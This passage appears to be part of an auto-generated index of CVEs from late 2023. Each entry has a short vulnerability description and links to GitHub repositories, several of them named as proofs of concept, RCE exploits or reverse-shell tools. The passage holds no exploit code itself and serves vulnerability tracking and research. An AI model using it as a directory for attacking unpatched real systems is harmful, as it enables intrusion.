[ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability) + +### CVE-2023-46017 (2023-11-13) + +SQL Injection vulnerability in receiverLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'remail' and 'rpassword' parameters. + + +- [ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) + +### CVE-2023-46018 (2023-11-13) + +SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 \allows attackers to run arbitrary SQL commands via 'remail' parameter. + + +- [ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) + +### CVE-2023-46019 (2023-11-13) + +Cross Site Scripting (XSS) vulnerability in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'error' parameter. + + +- [ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability) + +### CVE-2023-46020 (2023-11-13) + +Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'rename', 'remail', 'rphone' and 'rcity' parameters. + + +- [ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability) + +### CVE-2023-46021 (2023-11-13) + +SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter. + + +- [ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) + +### CVE-2023-46022 (2023-11-14) + +SQL Injection vulnerability in delete.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via the 'bid' parameter. + + +- [ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability) + +### CVE-2023-46197 (2024-05-17) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in supsystic.Com Popup by Supsystic allows Relative Path Traversal.This issue affects Popup by Supsystic: from n/a through 1.10.19. + + +- [RandomRobbieBF/CVE-2023-46197](https://github.com/RandomRobbieBF/CVE-2023-46197) + +### CVE-2023-46303 (2023-10-22) + +link_to_local_path in ebooks/conversion/plugins/html_input.py in calibre before 6.19.0 can, by default, add resources outside of the document root. + + +- [0x1717/ssrf-via-img](https://github.com/0x1717/ssrf-via-img) + +### CVE-2023-46304 (2024-04-30) + +modules/Users/models/Module.php in Vtiger CRM 7.5.0 allows a remote authenticated attacker to run arbitrary PHP code because an unprotected endpoint allows them to write this code to the config.inc.php file (executed on every page load). + + +- [jselliott/CVE-2023-46304](https://github.com/jselliott/CVE-2023-46304) + +### CVE-2023-46344 (2024-02-02) + +A vulnerability in Solar-Log Base 15 Firmware 6.0.1 Build 161, and possibly other Solar-Log Base products, allows an attacker to escalate their privileges by exploiting a stored cross-site scripting (XSS) vulnerability in the switch group function under /#ilang=DE&b=c_smartenergy_swgroups in the web portal. The vulnerability can be exploited to gain the rights of an installer or PM, which can then be used to gain administrative access to the web portal and execute further attacks. NOTE: The vendor states that this vulnerability has been fixed with 3.0.0-60 11.10.2013 for SL 200, 500, 1000 / not existing for SL 250, 300, 1200, 2000, SL 50 Gateway, SL Base. + + +- [vinnie1717/CVE-2023-46344](https://github.com/vinnie1717/CVE-2023-46344) + +### CVE-2023-46371 (2023-10-24) + +TP-Link device TL-WDR7660 2.0.30 and TL-WR886N 2.0.12 has a stack overflow vulnerability via the function upgradeInfoJsonToBin. + + +- [Jianchun-Ding/CVE-poc-update](https://github.com/Jianchun-Ding/CVE-poc-update) + +### CVE-2023-46404 (2023-11-03) + +PCRS <= 3.11 (d0de1e) “Questions” page and “Code editor” page are vulnerable to remote code execution (RCE) by escaping Python sandboxing. + + +- [windecks/CVE-2023-46404](https://github.com/windecks/CVE-2023-46404) + +### CVE-2023-46442 (-) + +An infinite loop in the retrieveActiveBody function of Soot before v4.4.1 under Java 8 allows attackers to cause a Denial of Service (DoS). + + +- [JAckLosingHeart/CVE-2023-46442_POC](https://github.com/JAckLosingHeart/CVE-2023-46442_POC) + +### CVE-2023-46447 (2024-01-20) + +The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE. + + +- [actuator/rebel](https://github.com/actuator/rebel) + +### CVE-2023-46449 (2023-10-26) + +Sourcecodester Free and Open Source inventory management system v1.0 is vulnerable to Incorrect Access Control. An arbitrary user can change the password of another user and takeover the account via IDOR in the password change function. + + +- [sajaljat/CVE-2023-46449](https://github.com/sajaljat/CVE-2023-46449) + +### CVE-2023-46450 (2023-10-26) + +Sourcecodester Free and Open Source inventory management system 1.0 is vulnerable to Cross Site Scripting (XSS) via the Add supplier function. + + +- [yte121/-CVE-2023-46450](https://github.com/yte121/-CVE-2023-46450) + +### CVE-2023-46451 (2023-10-31) + +Best Courier Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in the change username field. + + +- [sajaljat/CVE-2023-46451](https://github.com/sajaljat/CVE-2023-46451) + +### CVE-2023-46454 (2023-12-12) + +In GL.iNET GL-AR300M routers with firmware v4.3.7, it is possible to inject arbitrary shell commands through a crafted package name in the package information functionality. + + +- [cyberaz0r/GL.iNet-Multiple-Vulnerabilities](https://github.com/cyberaz0r/GL.iNet-Multiple-Vulnerabilities) + +### CVE-2023-46474 (2024-01-11) + +File Upload vulnerability PMB v.7.4.8 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted PHP file uploaded to the start_import.php file. + + +- [Xn2/CVE-2023-46474](https://github.com/Xn2/CVE-2023-46474) + +### CVE-2023-46478 (2023-10-30) + +An issue in minCal v.1.0.0 allows a remote attacker to execute arbitrary code via a crafted script to the customer_data parameter. + + +- [mr-xmen786/CVE-2023-46478](https://github.com/mr-xmen786/CVE-2023-46478) + +### CVE-2023-46501 (2023-11-07) + +An issue in BoltWire v.6.03 allows a remote attacker to obtain sensitive information via a crafted payload to the view and change admin password function. + + +- [Cyber-Wo0dy/CVE-2023-46501](https://github.com/Cyber-Wo0dy/CVE-2023-46501) + +### CVE-2023-46604 (2023-10-27) + +The Java OpenWire protocol marshaller is vulnerable to Remote Code \nExecution. This vulnerability may allow a remote attacker with network \naccess to either a Java-based OpenWire broker or client to run arbitrary\n shell commands by manipulating serialized class types in the OpenWire \nprotocol to cause either the client or the broker (respectively) to \ninstantiate any class on the classpath.\n\nUsers are recommended to upgrade\n both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 \nwhich fixes this issue.\n\n + + +- [trganda/ActiveMQ-RCE](https://github.com/trganda/ActiveMQ-RCE) +- [X1r0z/ActiveMQ-RCE](https://github.com/X1r0z/ActiveMQ-RCE) +- [JaneMandy/ActiveMQ_RCE_Pro_Max](https://github.com/JaneMandy/ActiveMQ_RCE_Pro_Max) +- [SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ) +- [evkl1d/CVE-2023-46604](https://github.com/evkl1d/CVE-2023-46604) +- [sule01u/CVE-2023-46604](https://github.com/sule01u/CVE-2023-46604) +- [justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp](https://github.com/justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp) +- [h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up](https://github.com/h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up) +- [duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell](https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell) +- [vjayant93/CVE-2023-46604-POC](https://github.com/vjayant93/CVE-2023-46604-POC) +- [LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence](https://github.com/LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence) +- [NKeshawarz/CVE-2023-46604-RCE](https://github.com/NKeshawarz/CVE-2023-46604-RCE) +- [minhangxiaohui/ActiveMQ_CVE-2023-46604](https://github.com/minhangxiaohui/ActiveMQ_CVE-2023-46604) +- [nitzanoligo/CVE-2023-46604-demo](https://github.com/nitzanoligo/CVE-2023-46604-demo) +- [tomasmussi-mulesoft/activemq-cve-2023-46604-duplicate](https://github.com/tomasmussi-mulesoft/activemq-cve-2023-46604-duplicate) +- [dcm2406/CVE-Lab](https://github.com/dcm2406/CVE-Lab) +- [mrpentst/CVE-2023-46604](https://github.com/mrpentst/CVE-2023-46604) +- [dcm2406/CVE-2023-46604](https://github.com/dcm2406/CVE-2023-46604) +- [Mudoleto/Broker_ApacheMQ](https://github.com/Mudoleto/Broker_ApacheMQ) +- [hh-hunter/cve-2023-46604](https://github.com/hh-hunter/cve-2023-46604) +- [stegano5/ExploitScript-CVE-2023-46604](https://github.com/stegano5/ExploitScript-CVE-2023-46604) +- [Arlenhiack/ActiveMQ-RCE-Exploit](https://github.com/Arlenhiack/ActiveMQ-RCE-Exploit) +- [vulncheck-oss/cve-2023-46604](https://github.com/vulncheck-oss/cve-2023-46604) +- [thinkycx/activemq-rce-cve-2023-46604](https://github.com/thinkycx/activemq-rce-cve-2023-46604) +- [mranv/honeypot.rs](https://github.com/mranv/honeypot.rs) +- [pulentoski/CVE-2023-46604](https://github.com/pulentoski/CVE-2023-46604) +- [cuanh2333/CVE-2023-46604](https://github.com/cuanh2333/CVE-2023-46604) + +### CVE-2023-46615 (2024-02-12) + +Deserialization of Untrusted Data vulnerability in Kalli Dan. KD Coming Soon.This issue affects KD Coming Soon: from n/a through 1.7.\n\n + + +- [RandomRobbieBF/CVE-2023-46615](https://github.com/RandomRobbieBF/CVE-2023-46615) + +### CVE-2023-46694 (-) + +Vtenext 21.02 allows an authenticated attacker to upload arbitrary files, potentially enabling them to execute remote commands. This flaw exists due to the application's failure to enforce proper authentication controls when accessing the Ckeditor file manager functionality. + + +- [invisiblebyte/CVE-2023-46694](https://github.com/invisiblebyte/CVE-2023-46694) + +### CVE-2023-46747 (2023-10-26) + +\n\n\nUndisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated\n\n + + +- [bijaysenihang/CVE-2023-46747-Mass-RCE](https://github.com/bijaysenihang/CVE-2023-46747-Mass-RCE) +- [W01fh4cker/CVE-2023-46747-RCE](https://github.com/W01fh4cker/CVE-2023-46747-RCE) +- [fu2x2000/CVE-2023-46747](https://github.com/fu2x2000/CVE-2023-46747) +- [maniak-academy/Mitigate-CVE-2023-46747](https://github.com/maniak-academy/Mitigate-CVE-2023-46747) +- [y4v4z/CVE-2023-46747-POC](https://github.com/y4v4z/CVE-2023-46747-POC) +- [nvansluis/test_cve-2023-46747](https://github.com/nvansluis/test_cve-2023-46747) +- [RevoltSecurities/CVE-2023-46747](https://github.com/RevoltSecurities/CVE-2023-46747) +- [vidura2/cve-2023-46747](https://github.com/vidura2/cve-2023-46747) +- [rainbowhatrkn/CVE-2023-46747-RCE](https://github.com/rainbowhatrkn/CVE-2023-46747-RCE) + +### CVE-2023-46805 (2024-01-12) + +An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks. + + +- [yoryio/CVE-2023-46805](https://github.com/yoryio/CVE-2023-46805) +- [cbeek-r7/CVE-2023-46805](https://github.com/cbeek-r7/CVE-2023-46805) +- [duy-31/CVE-2023-46805_CVE-2024-21887](https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887) +- [raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887](https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887) +- [seajaysec/Ivanti-Connect-Around-Scan](https://github.com/seajaysec/Ivanti-Connect-Around-Scan) +- [Chocapikk/CVE-2023-46805](https://github.com/Chocapikk/CVE-2023-46805) +- [mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped](https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped) +- [w2xim3/CVE-2023-46805](https://github.com/w2xim3/CVE-2023-46805) + +### CVE-2023-46813 (2023-10-27) + +An issue was discovered in the Linux kernel before 6.5.9, exploitable by local users with userspace access to MMIO registers. Incorrect access checking in the #VC handler and instruction emulation of the SEV-ES emulation of MMIO accesses could lead to arbitrary write access to kernel memory (and thus privilege escalation). This depends on a race condition through which userspace can replace an instruction before the #VC handler reads it. + + +- [Freax13/cve-2023-46813-poc](https://github.com/Freax13/cve-2023-46813-poc) + +### CVE-2023-46818 (2023-10-27) + +An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled. + + +- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit) + +### CVE-2023-46865 (2023-10-30) + +/api/v1/company/upload-logo in CompanyController.php in crater through 6.0.6 allows a superadmin to execute arbitrary PHP code by placing this code into an image/png IDAT chunk of a Company Logo image. + + +- [asylumdx/Crater-CVE-2023-46865-RCE](https://github.com/asylumdx/Crater-CVE-2023-46865-RCE) + +### CVE-2023-46870 (-) + +extcap/nrf_sniffer_ble.py, extcap/nrf_sniffer_ble.sh, extcap/SnifferAPI/*.py in Nordic Semiconductor nRF Sniffer for Bluetooth LE 3.0.0, 3.1.0, 4.0.0, 4.1.0, and 4.1.1 have set incorrect file permission, which allows attackers to do code execution via modified bash and python scripts. + + +- [Chapoly1305/CVE-2023-46870](https://github.com/Chapoly1305/CVE-2023-46870) + +### CVE-2023-46948 (2024-09-23) + +A reflected Cross-Site Scripting (XSS) vulnerability was found on Temenos T24 Browser R19.40 that enables a remote attacker to execute arbitrary JavaScript code via the skin parameter in the about.jsp and genrequest.jsp components. + + +- [AzraelsBlade/CVE-2023-46948](https://github.com/AzraelsBlade/CVE-2023-46948) + +### CVE-2023-46954 (2023-11-03) + +SQL Injection vulnerability in Relativity ODA LLC RelativityOne v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute arbitrary code via the name parameter. + + +- [jakedmurphy1/CVE-2023-46954](https://github.com/jakedmurphy1/CVE-2023-46954) + +### CVE-2023-46974 (2023-12-07) + +Cross Site Scripting vulnerability in Best Courier Management System v.1.000 allows a remote attacker to execute arbitrary code via a crafted payload to the page parameter in the URL. + + +- [yte121/CVE-2023-46974](https://github.com/yte121/CVE-2023-46974) + +### CVE-2023-46980 (2023-11-03) + +An issue in Best Courier Management System v.1.0 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted script to the userID parameter. + + +- [sajaljat/CVE-2023-46980](https://github.com/sajaljat/CVE-2023-46980) + +### CVE-2023-46998 (2023-11-07) + +Cross Site Scripting vulnerability in BootBox Bootbox.js v.3.2 through 6.0 allows a remote attacker to execute arbitrary code via a crafted payload to alert(), confirm(), prompt() functions. + + +- [soy-oreocato/CVE-2023-46998](https://github.com/soy-oreocato/CVE-2023-46998) + +### CVE-2023-47014 (2023-11-22) + +A Cross-Site Request Forgery (CSRF) vulnerability in Sourcecodester Sticky Notes App Using PHP with Source Code v.1.0 allows a local attacker to obtain sensitive information via a crafted payload to add-note.php. + + +- [emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS](https://github.com/emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS) + +### CVE-2023-47102 (2023-11-07) + +UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid. + + +- [nitipoom-jar/CVE-2023-47102](https://github.com/nitipoom-jar/CVE-2023-47102) + +### CVE-2023-47108 (2023-11-10) + +OpenTelemetry-Go Contrib is a collection of third-party packages for OpenTelemetry-Go. Prior to version 0.46.0, the grpc Unary Server Interceptor out of the box adds labels `net.peer.sock.addr` and `net.peer.sock.port` that have unbound cardinality. It leads to the server's potential memory exhaustion when many malicious requests are sent. An attacker can easily flood the peer address and port for requests. Version 0.46.0 contains a fix for this issue. As a workaround to stop being affected, a view removing the attributes can be used. The other possibility is to disable grpc metrics instrumentation by passing `otelgrpc.WithMeterProvider` option with `noop.NewMeterProvider`. + + +- [bahe-msft/govuln-CVE-2023-47108](https://github.com/bahe-msft/govuln-CVE-2023-47108) + +### CVE-2023-47119 (2023-11-10) + +Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, some links can inject arbitrary HTML tags when rendered through our Onebox engine. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. There are no known workarounds. + + +- [BaadMaro/CVE-2023-47119](https://github.com/BaadMaro/CVE-2023-47119) +- [Cristiano100/CVE-2023-47119](https://github.com/Cristiano100/CVE-2023-47119) + +### CVE-2023-47129 (2023-11-10) + +Statmic is a core Laravel content management system Composer package. Prior to versions 3.4.13 and 4.33.0, on front-end forms with an asset upload field, PHP files crafted to look like images may be uploaded. This only affects forms using the "Forms" feature and not just _any_ arbitrary form. This does not affect the control panel. This issue has been patched in 3.4.13 and 4.33.0.\n + + +- [Cyber-Wo0dy/CVE-2023-47129](https://github.com/Cyber-Wo0dy/CVE-2023-47129) + +### CVE-2023-47179 (2025-01-02) + +Missing Authorization vulnerability in ByConsole WooODT Lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooODT Lite: from n/a through 2.4.6. + + +- [RandomRobbieBF/CVE-2023-47179](https://github.com/RandomRobbieBF/CVE-2023-47179) + +### CVE-2023-47218 (2024-02-13) + +An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n + + +- [passwa11/CVE-2023-47218](https://github.com/passwa11/CVE-2023-47218) + +### CVE-2023-47246 (2023-11-10) + +In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023. + + +- [W01fh4cker/CVE-2023-47246-EXP](https://github.com/W01fh4cker/CVE-2023-47246-EXP) +- [rainbowhatrkn/CVE-2023-47246](https://github.com/rainbowhatrkn/CVE-2023-47246) +- [tucommenceapousser/CVE-2023-47246](https://github.com/tucommenceapousser/CVE-2023-47246) +- [XiaomingX/cve-2023-47246-poc](https://github.com/XiaomingX/cve-2023-47246-poc) + +### CVE-2023-47253 (2023-11-06) + +Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter. + + +- [OpenXP-Research/CVE-2023-47253](https://github.com/OpenXP-Research/CVE-2023-47253) +- [gmh5225/CVE-2023-47253](https://github.com/gmh5225/CVE-2023-47253) + +### CVE-2023-47355 (2024-02-05) + +The com.eypcnnapps.quickreboot (aka Eyuep Can Yilmaz {ROOT] Quick Reboot) application 1.0.8 for Android has exposed broadcast receivers for PowerOff, Reboot, and Recovery (e.g., com.eypcnnapps.quickreboot.widget.PowerOff) that are susceptible to unauthorized broadcasts because of missing input validation. + + +- [actuator/com.eypcnnapps.quickreboot](https://github.com/actuator/com.eypcnnapps.quickreboot) + +### CVE-2023-47400 +- [LucasVanHaaren/CVE-2023-47400](https://github.com/LucasVanHaaren/CVE-2023-47400) + +### CVE-2023-47437 (2023-11-27) + +A vulnerability has been identified in Pachno 1.0.6 allowing an authenticated attacker to execute a cross-site scripting (XSS) attack. The vulnerability exists due to inadequate input validation in the Project Description and comments, which enables an attacker to inject malicious java script. + + +- [herombey/CVE-2023-47437](https://github.com/herombey/CVE-2023-47437) + +### CVE-2023-47459 (2024-01-16) + +An issue in Knovos Discovery v.22.67.0 allows a remote attacker to obtain sensitive information via the /DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName component. + + +- [aleksey-vi/CVE-2023-47459](https://github.com/aleksey-vi/CVE-2023-47459) + +### CVE-2023-47460 (2024-01-16) + +SQL injection vulnerability in Knovos Discovery v.22.67.0 allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component. + + +- [aleksey-vi/CVE-2023-47460](https://github.com/aleksey-vi/CVE-2023-47460) + +### CVE-2023-47464 (2023-11-30) + +Insecure Permissions vulnerability in GL.iNet AX1800 version 4.0.0 before 4.5.0 allows a remote attacker to execute arbitrary code via the upload API function. + + +- [HadessCS/CVE-2023-47464](https://github.com/HadessCS/CVE-2023-47464) + +### CVE-2023-47488 (2023-11-09) + +Cross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted script to the attrib_manager_id parameter in the General Information page and the id parameter in the contact page. + + +- [nitipoom-jar/CVE-2023-47488](https://github.com/nitipoom-jar/CVE-2023-47488) + +### CVE-2023-47489 (2023-11-09) + +CSV injection in export as csv in Combodo iTop v.3.1.0-2-11973 allows a local attacker to execute arbitrary code via a crafted script to the export-v2.php and ajax.render.php components. + + +- [nitipoom-jar/CVE-2023-47489](https://github.com/nitipoom-jar/CVE-2023-47489) + +### CVE-2023-47504 (2024-04-24) + +Improper Authentication vulnerability in Elementor Elementor Website Builder allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Elementor Website Builder: from n/a through 3.16.4.\n\n + + +- [davidxbors/CVE-2023-47504-POC](https://github.com/davidxbors/CVE-2023-47504-POC) + +### CVE-2023-47529 (2023-11-23) + +Exposure of Sensitive Information to an Unauthorized Actor vulnerability in ThemeIsle Cloud Templates & Patterns collection.This issue affects Cloud Templates & Patterns collection: from n/a through 1.2.2.\n\n + + +- [RandomRobbieBF/CVE-2023-47529](https://github.com/RandomRobbieBF/CVE-2023-47529) + +### CVE-2023-47564 (2024-02-02) + +An incorrect permission assignment for critical resource vulnerability has been reported to affect Qsync Central. If exploited, the vulnerability could allow authenticated users to read or modify the resource via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQsync Central 4.4.0.15 ( 2024/01/04 ) and later\nQsync Central 4.3.0.11 ( 2024/01/11 ) and later\n + + +- [C411e/CVE-2023-47564](https://github.com/C411e/CVE-2023-47564) + +### CVE-2023-47668 (2023-11-23) + +Exposure of Sensitive Information to an Unauthorized Actor vulnerability in StellarWP Membership Plugin – Restrict Content plugin <= 3.2.7 versions. + + +- [RandomRobbieBF/CVE-2023-47668](https://github.com/RandomRobbieBF/CVE-2023-47668) +- [Nxploited/CVE-2023-47668](https://github.com/Nxploited/CVE-2023-47668) + +### CVE-2023-47840 (2023-12-29) + +Improper Control of Generation of Code ('Code Injection') vulnerability in Qode Interactive Qode Essential Addons.This issue affects Qode Essential Addons: from n/a through 1.5.2.\n\n + + +- [RandomRobbieBF/CVE-2023-47840](https://github.com/RandomRobbieBF/CVE-2023-47840) + +### CVE-2023-47882 (2023-12-27) + +The Kami Vision YI IoT com.yunyi.smartcamera application through 4.1.9_20231127 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component. + + +- [actuator/yi](https://github.com/actuator/yi) + +### CVE-2023-47883 (2023-12-27) + +The com.altamirano.fabricio.tvbrowser TV browser application through 4.5.1 for Android is vulnerable to JavaScript code execution via an explicit intent due to an exposed MainActivity. + + +- [actuator/com.altamirano.fabricio.tvbrowser](https://github.com/actuator/com.altamirano.fabricio.tvbrowser) + +### CVE-2023-47889 (2024-02-06) + +The Android application BINHDRM26 com.bdrm.superreboot 1.0.3, exposes several critical actions through its exported broadcast receivers. These exposed actions can allow any app on the device to send unauthorized broadcasts, leading to unintended consequences. The vulnerability is particularly concerning because these actions include powering off, system reboot & entering recovery mode. + + +- [actuator/com.bdrm.superreboot](https://github.com/actuator/com.bdrm.superreboot) + +### CVE-2023-48022 (2023-11-28) + +Anyscale Ray 2.6.3 and 2.8.0 allows a remote attacker to execute arbitrary code via the job submission API. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment + + +- [0x656565/CVE-2023-48022](https://github.com/0x656565/CVE-2023-48022) +- [jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022](https://github.com/jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022) + +### CVE-2023-48028 (2023-11-17) + +kodbox 1.46.01 has a security flaw that enables user enumeration. This problem is present on the login page, where an attacker can identify valid users based on varying response messages, potentially paving the way for a brute force attack. + + +- [nitipoom-jar/CVE-2023-48028](https://github.com/nitipoom-jar/CVE-2023-48028) + +### CVE-2023-48029 (2023-11-17) + +Corebos 8.0 and below is vulnerable to CSV Injection. An attacker with low privileges can inject a malicious command into a table. This vulnerability is exploited when an administrator visits the user management section, exports the data to a CSV file, and then opens it, leading to the execution of the malicious payload on the administrator's computer. + + +- [nitipoom-jar/CVE-2023-48029](https://github.com/nitipoom-jar/CVE-2023-48029) + +### CVE-2023-48031 (2023-11-17) + +OpenSupports v4.11.0 is vulnerable to Unrestricted Upload of File with Dangerous Type. In the comment function, an attacker can bypass security restrictions and upload a .bat file by manipulating the file's magic bytes to masquerade as an allowed type. This can enable the attacker to execute arbitrary code or establish a reverse shell, leading to unauthorized file writes or control over the victim's station via a crafted file upload operation. + + +- [nitipoom-jar/CVE-2023-48031](https://github.com/nitipoom-jar/CVE-2023-48031) + +### CVE-2023-48034 (2023-11-27) + +An issue discovered in Acer Wireless Keyboard SK-9662 allows attacker in physical proximity to both decrypt wireless keystrokes and inject arbitrary keystrokes via use of weak encryption. + + +- [aprkr/CVE-2023-48034](https://github.com/aprkr/CVE-2023-48034) + +### CVE-2023-48084 (2023-12-14) + +Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool. + + +- [Hamibubu/CVE-2023-48084](https://github.com/Hamibubu/CVE-2023-48084) +- [bucketcat/CVE-2023-48084](https://github.com/bucketcat/CVE-2023-48084) + +### CVE-2023-48104 (2024-01-16) + +Alinto SOGo before 5.9.1 is vulnerable to HTML Injection. + + +- [E1tex/CVE-2023-48104](https://github.com/E1tex/CVE-2023-48104) + +### CVE-2023-48123 (2023-12-06) + +An issue in Netgate pfSense Plus v.23.05.1 and before and pfSense CE v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the packet_capture.php file. + + +- [NHPT/CVE-2023-48123](https://github.com/NHPT/CVE-2023-48123) + +### CVE-2023-48194 (2024-07-09) + +Vulnerability in Tenda AC8v4 .V16.03.34.09 due to sscanf and the last digit of s8 being overwritten with \x0. After executing set_client_qos, control over the gp register can be obtained. + + +- [zt20xx/CVE-2023-48194](https://github.com/zt20xx/CVE-2023-48194) + +### CVE-2023-48197 (2023-11-15) + +Cross-Site Scripting (XSS) vulnerability in the ‘manageApiKeys’ component of Grocy 4.0.3 and earlier allows attackers to obtain victim's cookies when the victim clicks on the "see QR code" function. + + +- [nitipoom-jar/CVE-2023-48197](https://github.com/nitipoom-jar/CVE-2023-48197) + +### CVE-2023-48198 (2023-11-15) + +A Cross-Site Scripting (XSS) vulnerability in the 'product description' component within '/api/stock/products' of Grocy version <= 4.0.3 allows attackers to obtain a victim's cookies. + + +- [nitipoom-jar/CVE-2023-48198](https://github.com/nitipoom-jar/CVE-2023-48198) + +### CVE-2023-48199 (2023-11-15) + +HTML Injection vulnerability in the 'manageApiKeys' component in Grocy <= 4.0.3 allows attackers to inject arbitrary HTML content without script execution. This occurs when user-supplied data is not appropriately sanitized, enabling the injection of HTML tags through parameter values. The attacker can then manipulate page content in the QR code detail popup, often coupled with social engineering tactics, exploiting both the trust of users and the application's lack of proper input handling. + + +- [nitipoom-jar/CVE-2023-48199](https://github.com/nitipoom-jar/CVE-2023-48199) + +### CVE-2023-48200 (2023-11-15) + +Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the equipment description component within /equipment/ component. + + +- [nitipoom-jar/CVE-2023-48200](https://github.com/nitipoom-jar/CVE-2023-48200) + +### CVE-2023-48777 (2024-03-26) + +Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder.This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.\n\n + + +- [AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777](https://github.com/AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777) + +### CVE-2023-48788 (2024-03-12) + +A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets. + + +- 